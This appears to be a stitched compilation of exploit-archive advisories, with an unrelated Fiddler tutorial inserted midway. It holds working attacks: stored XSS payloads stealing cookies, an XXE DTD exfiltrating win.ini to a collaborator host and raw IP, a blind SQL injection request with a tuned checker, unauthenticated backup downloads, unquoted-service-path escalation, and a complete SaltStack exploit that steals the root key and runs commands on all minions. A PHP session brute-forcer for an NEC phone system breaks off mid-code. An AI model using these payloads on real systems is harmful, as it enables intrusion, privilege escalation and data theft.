# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 10.0.18363 N/A Build 18363

# Step to discover Unquoted Service Path:

C:\Users\minht>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

OutlineService  OutlineService  C:\Program Files (x86)\Outline\OutlineService.exe

C:\Users\minht>sc qc OutlineService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: OutlineService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Outline\OutlineService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OutlineService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
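The `findstr` pipeline above flags the unquoted path but leaves the reader to work out which files Windows will try before the real binary. The following is an added example, not part of the advisory, that parses constructed `sc qc` output in the layout shown, applies the same filters (auto-start, not under C:\Windows, not quoted) and lists the hijack candidates Windows' documented command-line search produces by cutting the path at each space and appending `.exe`. The three service blocks are constructed sample data.

```python
import re

# Constructed `sc qc` output for three services (same layout as on the page)
SC_QC_SAMPLE = """
SERVICE_NAME: OutlineService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\\Program Files (x86)\\Outline\\OutlineService.exe
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: ExampleAgent
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : "C:\\Program Files\\Example\\agent.exe" --service
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: wuauserv
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 3   DEMAND_START
        BINARY_PATH_NAME   : C:\\Windows\\system32\\svchost.exe -k netsvcs
        SERVICE_START_NAME : LocalSystem
"""

FIELD = re.compile(
    r"^\s*(SERVICE_NAME|START_TYPE|BINARY_PATH_NAME|SERVICE_START_NAME)\s*:\s*(.*?)\s*$",
    re.MULTILINE)


def parse_sc_qc(text: str) -> list:
    """Turn concatenated `sc qc` blocks into one dict per service."""
    services, current = [], None
    for key, value in FIELD.findall(text):
        if key == "SERVICE_NAME":
            current = {"name": value}
            services.append(current)
        elif current is not None:
            current[key] = value
    return services


def exe_part(binary_path: str) -> str:
    """The executable portion of an unquoted command line (up to and including .exe)."""
    m = re.match(r"^(.*?\.exe)", binary_path, re.IGNORECASE)
    return m.group(1) if m else binary_path.split(" ", 1)[0]


def hijack_candidates(binary_path: str) -> list:
    """Files CreateProcess tries before the real binary when the path is unquoted:
    the line is cut at each space and '.exe' appended. Any of these that a
    low-privileged user can create runs as the service account."""
    exe = exe_part(binary_path)
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def find_unquoted(text: str, skip_prefix: str = "c:\\windows\\") -> list:
    """Mirror the findstr pipeline: skip quoted paths and C:\\Windows, then flag
    executables whose path contains a space."""
    findings = []
    for svc in parse_sc_qc(text):
        path = svc.get("BINARY_PATH_NAME", "")
        if path.startswith('"') or path.lower().startswith(skip_prefix):
            continue
        if " " not in exe_part(path):
            continue
        findings.append({
            "name": svc["name"],
            "auto_start": "AUTO_START" in svc.get("START_TYPE", ""),
            "account": svc.get("SERVICE_START_NAME", ""),
            "candidates": hijack_candidates(path),
        })
    return findings
```

For the Outline service the candidates are `C:\Program.exe` and `C:\Program Files.exe`; both sit in locations a standard user normally cannot write to, which is the check to make before calling the finding exploitable on a given host.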
-
osTicket 1.14.1 - Persistent Authenticated Cross-Site Scripting
# Title: osTicket 1.14.1 - Persistent Authenticated Cross-Site Scripting
# Author: Mehmet Kelepce / Gais Cyber Security
# Date : 2020-03-24
# Source Link: https://github.com/osticket/osticket/commit/fc4c8608fa122f38673b9dddcb8fef4a15a9c884
# Vendor: http://osticket.com
# Remotely Exploitable: Yes
# Dynamic Coding Language: PHP
# CVSSv3 Base Score: 7.4 (AV:N, AC:L, PR:L, UI:N, S:C, C:L, I:L, A:L)

## This vulnerability was found by examining the source code.

PoC: Ticket SLA Plan Name - HTTP POST REQUEST
##########################################################

POST /upload/scp/slas.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/upload/scp/slas.php?id=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
Connection: close
Cookie: cookie=3333; OSTSESSID=684d6hn7dfk869kupbhc9hq2qv
Upgrade-Insecure-Requests: 1

submit=Save+Changes&__CSRFToken__=6174a3343a6277b2e5faae240188d54624a756d7&do=update&a=&id=1&name=%3Csvg+onload%3Dconfirm%28document.cookie%29%3B%3E&isactive=1&grace_period=48&schedule_id=0&notes=

Vulnerable parameter: name
Parameter file: /scp/slas.php

The SLA plan name (here `<svg onload=confirm(document.cookie);>`) is stored unescaped and rendered wherever the SLA is displayed, so assigning the plan to any ticket fires the payload for every agent who views it.

## Risk: the cookie (session) information of the targeted user can be obtained.
-
BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection
# Title: BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection
# Author: Daniel Martinez Adan (aDoN90)
# Date: 2020-05-01
# Homepage: https://blogengine.io/
# Software Link: https://blogengine.io/support/download/
# Affected Versions: 3.3
# Vulnerability: XML External Entity (XXE OOB) Injection Vulnerability
# Severity: High
# Status: Fixed
# CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H

Technical Details
--------------------
Url: http://websiteurl-blogengine3.3/syndication.axd
Parameter Name: apml
Parameter Type: GET

The apml parameter is a URL that the server fetches and parses as XML, so the request is first an SSRF and then, because the parser resolves external entities, an XXE. The three patterns below build on each other.

*Attack Pattern 1 (SSRF HTTP Interaction):*

http://websiteurl-blogengine3.3/syndication.axd?apml=http://hav4zt9bu9ihxzvcg59lqfapzg5it7.burpcollaborator.net

*Attack Pattern 2 (SSRF to XXE HTTP Interaction):*

http://b5baa301-b569-4bbf-afd9-d2eb264fdcbf.gdsdemo.com/blog/syndication.axd?apml=http://attackerip:8000/miau.txt

miau.txt
-----------------------------
<!DOCTYPE foo SYSTEM "http://dgx2pxtwxkvgvkubo7ksvkywtnzhn6.burpcollaborator.net">
-----------------------------

*Attack Pattern 3 (SSRF to XXE Exfiltration):*

miau.txt
-----------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://37.187.112.19:8000/test1.dtd">
%sp;
%param1;
%exfil;
]>
-----------------------------

test1.dtd
-----------------------------
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://y76a7hgbrccuyclwxwcp3br74yayyn.burpcollaborator.net/?%data;'>">
-----------------------------

Loading test1.dtd defines %data (the contents of win.ini) and %param1; expanding %param1 declares %exfil with the file contents embedded in its URL, and %exfil; makes the server request that URL, delivering the file to the collaborator host.
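The difference between Patterns 2 and 3 and a safe deployment is one parser setting: whether external entities are resolved at all. BlogEngine is an ASP.NET application, so the following is an added example in Python, not BlogEngine code, that shows the same weak-versus-safe behaviour with Python's expat-based SAX reader: a constructed APML-shaped document references a local file through an external entity, and the parser is run once with external general entities enabled (the leak) and once with the default (no leak). The temp file and its secret string are constructed for the demo.

```python
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Gathers character data so we can see what the parser expanded &xxe; into."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_document(xml_bytes: bytes, resolve_external: bool) -> str:
    """Parse with external general entities either resolved (the weak setting the
    advisory exploits) or ignored (the reader's safe default)."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def build_apml_with_entity(target_uri: str) -> bytes:
    """Constructed document in the shape an attacker would host as miau.txt, with the
    entity pointed at a local file instead of win.ini."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE apml [ <!ENTITY xxe SYSTEM "%s"> ]>\n'
        '<apml>&xxe;</apml>' % target_uri
    ).encode()


def demo_xxe(secret: str = "TOPSECRET-constructed"):
    """Write a secret to a temp file, reference it via an external entity, parse both
    ways. Returns (text_with_resolution, text_without_resolution)."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write(secret)
    try:
        doc = build_apml_with_entity(pathlib.Path(path).as_uri())
        leaked = parse_document(doc, resolve_external=True)
        safe = parse_document(doc, resolve_external=False)
    finally:
        os.remove(path)
    return leaked, safe
```

The fix on the server side is the same idea in whichever XML stack is in use: disable DTD processing or external entity resolution for any document fetched from a user-supplied URL, and keep the fetch itself restricted to expected hosts so Pattern 1 is closed too.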
-
webERP 4.15.1 - Unauthenticated Backup File Access
# Exploit Title: webERP 4.15.1 - Unauthenticated Backup File Access
# Date: 2020-05-01
# Author: Besim ALTINOK
# Vendor Homepage: http://www.weberp.org
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15.1
# Tested on: Xampp
# Credit: İsmail BOZKURT

--------------------------------------------------------------------------
About Software:

webERP is a complete web-based accounting and business management system that requires only a web-browser and pdf reader to use. It has a wide range of features suitable for many businesses, particularly distributed businesses in wholesale, distribution, and manufacturing.

-------------------------------------------------------
PoC: Unauthenticated Backup File Access
---------------------------------------------

1- This file generates a new backup file (no authentication required):

http://localhost/webERP/BackUpDatabase.php

2- Anyone can then download the backup file from the web root:

http://localhost/webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz
-
Online Scheduling System 1.0 - 'username' SQL Injection
# Exploit Title: Online Scheduling System 1.0 - 'username' SQL Injection
# Date: 2020-05-04
# Exploit Author: Saurav Shukla
# Vendor Homepage: https://www.sourcecodester.com/php/14168/online-scheduling-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-scheduling-system.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

---------------------------------------------------------------------------------

# Vulnerable parameter: username

# Injected Request (time-based blind: the response is delayed by the injected sleep(50))

POST /oss/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://localhost
Connection: close
Referer: http://localhost/oss/Register.php
Cookie: PHPSESSID=091v1e2g6109rrbduk924psea9
Upgrade-Insecure-Requests: 1

username=admin' and sleep(50)--+&password=admin&lgn=Add
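Both time-based checks on this page (the addressbook script and the request above) decide on a single request against a fixed threshold, which fires on any slow server. The following is an added example, not code from either advisory, of a baseline-aware version: it measures the median time of a benign login several times, then of the SLEEP() payload, and reports a hit only if the difference is most of the requested delay. The two `simulated_*_login` senders are constructed stand-ins for login.php so the check runs offline; `http_sender` is the real sender for an assumed target URL.

```python
import re
import statistics
import time
from urllib.parse import quote


def sleep_payload(seconds) -> str:
    """The MySQL SLEEP() payload shape from the request above, URL-encoded for a form body."""
    return quote("admin' AND SLEEP(%s)-- " % seconds, safe="")


def measure(send, body: str, samples: int) -> float:
    """Median wall-clock time of `samples` identical POSTs; the median resists one slow outlier."""
    times = []
    for _ in range(samples):
        start = time.monotonic()
        send(body)
        times.append(time.monotonic() - start)
    return statistics.median(times)


def is_time_blind_injectable(send, field: str = "username", delay=5, samples: int = 3) -> bool:
    """Baseline-aware check: the injected requests must be slower than the benign ones
    by at least 80% of the requested delay."""
    benign = "%s=admin&password=admin&lgn=Login" % field
    injected = "%s=%s&password=admin&lgn=Login" % (field, sleep_payload(delay))
    baseline = measure(send, benign, samples)
    delayed = measure(send, injected, samples)
    return delayed - baseline >= 0.8 * delay


def http_sender(url: str):
    """Sender for a real target (assumed URL; only for systems you are authorised to test)."""
    import urllib.request

    def send(body: str) -> None:
        req = urllib.request.Request(
            url, data=body.encode(), method="POST",
            headers={"Content-Type": "application/x-www-form-urlencoded"})
        urllib.request.urlopen(req, timeout=60).read()
    return send


# Constructed stand-ins for login.php so the check can be exercised offline.
def simulated_vulnerable_login(body: str) -> None:
    """Concatenates `username` into its query, so SLEEP(n) from the request is honoured."""
    m = re.search(r"SLEEP%28([\d.]+)%29", body)
    time.sleep(float(m.group(1)) if m else 0.01)


def simulated_patched_login(body: str) -> None:
    """Parameterised query: the payload is just a string, so no delay."""
    time.sleep(0.01)
```

Against a live target, keep `delay` at a few seconds and `samples` at three or more; a sleep(50) as in the request above is unnecessary and just ties up the server's worker.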
-
Saltstack 3000.1 - Remote Code Execution
# Exploit Title: Saltstack 3000.1 - Remote Code Execution # Date: 2020-05-04 # Exploit Author: Jasper Lievisse Adriaanse # Vendor Homepage: https://www.saltstack.com/ # Version: < 3000.2, < 2019.2.4, 2017.*, 2018.* # Tested on: Debian 10 with Salt 2019.2.0 # CVE : CVE-2020-11651 and CVE-2020-11652 # Discription: Saltstack authentication bypass/remote code execution # # Source: https://github.com/jasperla/CVE-2020-11651-poc # This exploit is based on this checker script: # https://github.com/rossengeorgiev/salt-security-backports #!/usr/bin/env python # # Exploit for CVE-2020-11651 and CVE-2020-11652 # Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc) # This exploit is based on this checker script: # https://github.com/rossengeorgiev/salt-security-backports from __future__ import absolute_import, print_function, unicode_literals import argparse import datetime import os import os.path import sys import time import salt import salt.version import salt.transport.client import salt.exceptions def init_minion(master_ip, master_port): minion_config = { 'transport': 'zeromq', 'pki_dir': '/tmp', 'id': 'root', 'log_level': 'debug', 'master_ip': master_ip, 'master_port': master_port, 'auth_timeout': 5, 'auth_tries': 1, 'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port) } return salt.transport.client.ReqChannel.factory(minion_config, crypt='clear') # --- check funcs ---- def check_connection(master_ip, master_port, channel): print("[+] Checking salt-master ({}:{}) status... ".format(master_ip, master_port), end='') sys.stdout.flush() # connection check try: channel.send({'cmd':'ping'}, timeout=2) except salt.exceptions.SaltReqTimeoutError: print("OFFLINE") sys.exit(1) else: print("ONLINE") def check_CVE_2020_11651(channel): print("[+] Checking if vulnerable to CVE-2020-11651... 
", end='') sys.stdout.flush() try: rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3) except: print('ERROR') return None else: pass finally: if rets: print('YES') root_key = rets[2]['root'] return root_key print('NO') return None def check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path): print("[+] Checking if vulnerable to CVE-2020-11652 (read_token)... ", end='') sys.stdout.flush() # try read file msg = { 'cmd': 'get_token', 'arg': [], 'token': top_secret_file_path, } try: rets = channel.send(msg, timeout=3) except salt.exceptions.SaltReqTimeoutError: print("YES") except: print("ERROR") raise else: if debug: print() print(rets) print("NO") def check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key): print("[+] Checking if vulnerable to CVE-2020-11652 (read)... ", end='') sys.stdout.flush() # try read file msg = { 'key': root_key, 'cmd': 'wheel', 'fun': 'file_roots.read', 'path': top_secret_file_path, 'saltenv': 'base', } try: rets = channel.send(msg, timeout=3) except salt.exceptions.SaltReqTimeoutError: print("TIMEOUT") except: print("ERROR") raise else: if debug: print() print(rets) if rets['data']['return']: print("YES") else: print("NO") def check_CVE_2020_11652_write1(debug, channel, root_key): print("[+] Checking if vulnerable to CVE-2020-11652 (write1)... ", end='') sys.stdout.flush() # try read file msg = { 'key': root_key, 'cmd': 'wheel', 'fun': 'file_roots.write', 'path': '../../../../../../../../tmp/salt_CVE_2020_11652', 'data': 'evil', 'saltenv': 'base', } try: rets = channel.send(msg, timeout=3) except salt.exceptions.SaltReqTimeoutError: print("TIMEOUT") except: print("ERROR") raise else: if debug: print() print(rets) pp(rets) if rets['data']['return'].startswith('Wrote'): try: os.remove('/tmp/salt_CVE_2020_11652') except OSError: print("Maybe?") else: print("YES") else: print("NO") def check_CVE_2020_11652_write2(debug, channel, root_key): print("[+] Checking if vulnerable to CVE-2020-11652 (write2)... 
", end='') sys.stdout.flush() # try read file msg = { 'key': root_key, 'cmd': 'wheel', 'fun': 'config.update_config', 'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652', 'yaml_contents': 'evil', 'saltenv': 'base', } try: rets = channel.send(msg, timeout=3) except salt.exceptions.SaltReqTimeoutError: print("TIMEOUT") except: print("ERROR") raise else: if debug: print() print(rets) if rets['data']['return'].startswith('Wrote'): try: os.remove('/tmp/salt_CVE_2020_11652.conf') except OSError: print("Maybe?") else: print("YES") else: print("NO") def pwn_read_file(channel, root_key, path, master_ip): print("[+] Attemping to read {} from {}".format(path, master_ip)) sys.stdout.flush() msg = { 'key': root_key, 'cmd': 'wheel', 'fun': 'file_roots.read', 'path': path, 'saltenv': 'base', } rets = channel.send(msg, timeout=3) print(rets['data']['return'][0][path]) def pwn_upload_file(channel, root_key, src, dest, master_ip): print("[+] Attemping to upload {} to {} on {}".format(src, dest, master_ip)) sys.stdout.flush() try: fh = open(src, 'rb') payload = fh.read() fh.close() except Exception as e: print('[-] Failed to read {}: {}'.format(src, e)) return msg = { 'key': root_key, 'cmd': 'wheel', 'fun': 'file_roots.write', 'saltenv': 'base', 'data': payload, 'path': dest, } rets = channel.send(msg, timeout=3) print('[ ] {}'.format(rets['data']['return'])) def pwn_exec(channel, root_key, cmd, master_ip, jid): print("[+] Attemping to execute {} on {}".format(cmd, master_ip)) sys.stdout.flush() msg = { 'key': root_key, 'cmd': 'runner', 'fun': 'salt.cmd', 'saltenv': 'base', 'user': 'sudo_user', 'kwarg': { 'fun': 'cmd.exec_code', 'lang': 'python', 'code': "import subprocess;subprocess.call('{}',shell=True)".format(cmd) }, 'jid': jid, } try: rets = channel.send(msg, timeout=3) except Exception as e: print('[-] Failed to submit job') return if rets.get('jid'): print('[+] Successfully scheduled job: {}'.format(rets['jid'])) def pwn_exec_all(channel, root_key, cmd, master_ip, 
                 jid):
    print("[+] Attemping to execute '{}' on all minions connected to {}".format(cmd, master_ip))
    sys.stdout.flush()
    msg = {
        'key': root_key,
        'cmd': '_send_pub',
        'fun': 'cmd.run',
        'user': 'root',
        'arg': [
            "/bin/sh -c '{}'".format(cmd)
        ],
        'tgt': '*',
        'tgt_type': 'glob',
        'ret': '',
        'jid': jid
    }
    try:
        rets = channel.send(msg, timeout=3)
    except Exception as e:
        print('[-] Failed to submit job')
        return
    else:
        # the original used finally: here, which raised NameError on the
        # exception path because rets was never assigned
        if rets == None:
            print('[+] Successfully submitted job to all minions.')
        else:
            print('[-] Failed to submit job')


def main():
    parser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and CVE-2020-11652')
    parser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1')
    parser.add_argument('--port', '-p', dest='master_port', default='4506')
    parser.add_argument('--force', '-f', dest='force', default=False, action='store_false')
    parser.add_argument('--debug', '-d', dest='debug', default=False, action='store_true')
    parser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true')
    parser.add_argument('--read', '-r', dest='read_file')
    parser.add_argument('--upload-src', dest='upload_src')
    parser.add_argument('--upload-dest', dest='upload_dest')
    parser.add_argument('--exec', dest='exec', help='Run a command on the master')
    parser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions')
    args = parser.parse_args()

    print("[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.")
    time.sleep(1)

    # Both src and destination are required for uploads
    if (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None):
        print('[-] Must provide both --upload-src and --upload-dest')
        sys.exit(1)

    channel = init_minion(args.master_ip, args.master_port)
    check_connection(args.master_ip, args.master_port, channel)
    root_key = check_CVE_2020_11651(channel)
    if root_key:
        print('[*] root key obtained: {}'.format(root_key))
    else:
        print('[-] Failed to find root key...aborting')
        sys.exit(127)

    if args.run_checks:
        # Assuming this check runs on the master itself, create a file with "secret" content
        # and abuse CVE-2020-11652 to read it.
        top_secret_file_path = '/tmp/salt_cve_teta'
        with salt.utils.fopen(top_secret_file_path, 'w') as fd:
            fd.write("top secret")
        # Again, this assumes we're running this check on the master itself
        with salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd:
            root_key = keyfd.read()
        # the original passed an undefined name `debug` here; the parsed flag is args.debug
        check_CVE_2020_11652_read_token(args.debug, channel, top_secret_file_path)
        check_CVE_2020_11652_read(args.debug, channel, top_secret_file_path, root_key)
        check_CVE_2020_11652_write1(args.debug, channel, root_key)
        check_CVE_2020_11652_write2(args.debug, channel, root_key)
        os.remove(top_secret_file_path)
        sys.exit(0)

    if args.read_file:
        pwn_read_file(channel, root_key, args.read_file, args.master_ip)

    if args.upload_src:
        if os.path.isabs(args.upload_dest):
            print('[-] Destination path must be relative; aborting')
            sys.exit(1)
        pwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip)

    jid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow())
    if args.exec:
        pwn_exec(channel, root_key, args.exec, args.master_ip, jid)

    if args.exec_all:
        print("[!] Lester, is this what you want? Hit ^C to abort.")
        time.sleep(2)
        pwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid)


if __name__ == '__main__':
    main()
-
Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path
# Exploit Title: Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path
# Discovery by: Nguyen Khang - SunCSR
# Discovery Date: 2020-05-03
# Vendor Homepage: https://www.oracle.com/
# Software Link: https://www.oracle.com/database/technologies/112010-win64soft.html
# Tested Version: 11g release 2
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 10.0.18363 N/A Build 18363

# Step to discover Unquoted Service Path:

C:\Users\cm0s>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

OracleDBConsoleorcl              OracleDBConsoleorcl              C:\Oracle\product\11.2.0\dbhome_1\bin\nmesrvc.exe       Auto
OracleOraDb11g_home1TNSListener  OracleOraDb11g_home1TNSListener  C:\Oracle\product\11.2.0\dbhome_1\BIN\TNSLSNR           Auto
OracleServiceORCL                OracleServiceORCL                c:\oracle\product\11.2.0\dbhome_1\bin\ORACLE.EXE ORCL   Auto

C:\Users\cm0s>sc qc OracleDBConsoleorcl
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: OracleDBConsoleorcl
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Oracle\product\11.2.0\dbhome_1\bin\nmesrvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OracleDBConsoleorcl
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\cm0s>sc qc OracleOraDb11g_home1TNSListener
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: OracleOraDb11g_home1TNSListener
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Oracle\product\11.2.0\dbhome_1\BIN\TNSLSNR
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OracleOraDb11g_home1TNSListener
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\cm0s>sc qc OracleServiceORCL
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: OracleServiceORCL
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : c:\oracle\product\11.2.0\dbhome_1\bin\ORACLE.EXE ORCL
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OracleServiceORCL
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Exploit:
# A successful attempt would require the local user to be able to insert
# their code in the system root path undetected by the OS or other security
# applications where it could potentially be executed during application
# startup or reboot. If successful, the local user's code would execute
# with the elevated privileges of the application.
-
Title: Fiddler from Beginner to Give Up
Fiddler is one of the most powerful and most widely used web debugging tools. It can record HTTP and HTTPS requests between any client and server, and it allows you to monitor, set breakpoints, and even modify input and output data. Fiddler includes a powerful event-script-based subsystem and can be extended using .NET languages. In other words, the more you understand the HTTP protocol, the more you can master Fiddler; and the more you use Fiddler, the more it will help you understand the HTTP protocol. Fiddler is a very useful tool for developers and testers.

Download and Install

Go directly to the official website to download it. Official website address: https://www.telerik.com/fiddler
The file is relatively small, about 6 MB. Install it directly after the download completes. After installation completes, it looks as follows.

Panel Introduction

Left Panel

The order of HTTP requests starts from 1, incrementing in the order in which the page's requests are loaded.
Result: The status of the HTTP response
Protocol: The protocol used by the request (such as HTTP/HTTPS)
HOST: Domain name/IP of the request address
URL: The requested server path and file name, also containing GET parameters
BODY: The size of the request, in bytes
Content-Type: The type of the request response
Caching: The request's cache expiration time or the cache-control header value
Process: The Windows process and process ID that issued this request
Comments: Notes the user adds to this session through scripts or menus
Custom: Custom values that users can set through scripts

Right Panel

Statistics tab: Through this tab, the user can obtain overall statistics for a set of sessions by selecting multiple sessions, such as the number of bytes requested and transmitted. Select the first request and the last request to get the overall time spent loading the entire page. From the bar chart you can also see which requests take the most time, so as to optimize the page's access speed.

Inspectors tab: It provides Headers, TextView, HexView, Raw and other views for inspecting a single HTTP request message. It is divided into two parts: the upper part shows the HTTP Request and the lower part shows the HTTP Response.

AutoResponse tab: Fiddler's most practical function is that it can capture online pages and save them locally for debugging, greatly reducing the difficulty of online debugging. It allows us to modify the data returned by the server, such as making every response an HTTP 404 or reading local files as the returned content.

Composer tab: Supports manually constructing and sending HTTP, HTTPS and FTP requests. We can also drag a session from the web session list and drop it into the Composer tab. When we click the Execute button, the request is sent to the server.

Log tab: Prints the log.

Filters tab: The filter can filter the data stream list on the left, and we can mark, modify, or hide data streams with certain characteristics.

Capturing HTTPS Packets

By default, only HTTP packets can be captured. To capture HTTPS packets, a few simple settings are needed.
Click Tools - Options - HTTPS and check the following options.
Then click Actions - Export Root Certificate to Desktop; the certificate file will appear on the desktop.
Next we need to import the certificate into the browser, taking Google Chrome as an example: click Settings - Security and Privacy - Security - Manage Certificates.
Now we can capture HTTPS packets.
-
Online Clothing Store 1.0 - Persistent Cross-Site Scripting
# Exploit Title: Online Clothing Store 1.0 - Persistent Cross-Site Scripting
# Date: 2020-05-05
# Exploit Author: Sushant Kamble
# Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

# Vulnerable Page: Offers.php
# Parameter Vulnerable: Offer Detail

ONLINE CLOTHING STORE 1.0 is vulnerable to Stored XSS. An admin user can add a malicious script to the offer page; when a normal user visits the page, the script gets executed.

# Exploit:
Open offer.php
Add the script below in Offer Detail:
<script>alert(document.cookie)</script>
Save
-
NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration
# Title: NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration
# Author: Cold z3ro
# Date: 2020-05-04
# Homepage: https://www.0x30.cc/
# Vendor Homepage: https://www.nec.com
# Version: 01.03.01
# Description: NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration

<?php
set_time_limit(0);

$host    = "192.168.0.14";
$url     = "http://" . $host;   // the original never defined $url; it is derived from $host here
$start   = 100;
$end     = 30000;
$maxproc = 50;
$execute = 0;

echo "\n[+] NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration\n\n";
sleep(3);

for ($i = $start; $i <= $end; $i++) {
    $pid = @pcntl_fork();
    $execute++;
    // throttle: once $maxproc children are running, wait for them to finish
    if ($execute >= $maxproc) {
        while (pcntl_waitpid(0, $status) != -1) {
            $status  = pcntl_wexitstatus($status);
            $execute = 0;
            usleep(3000);
        }
    }
    if (!$pid) {
        // child process: test one session id, then exit
        echo $url . " checking $i\n";
        login($url, $i);
        flush();
        exit;
    }
}

function login($url, $key)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url . '/PyxisUaMenu.htm?sessionId=' . $key . '&MAINFRM(444,-1,591)#');
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 80);
    curl_setopt($ch, CURLOPT_TIMEOUT, 80);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
    curl_setopt($ch, CURLOPT_HEADER, FALSE);
    $content = curl_exec($ch);
    curl_close($ch);
    if (preg_match('/Telephone/i', $content) || preg_match('/Mailbox/i', $content)) {
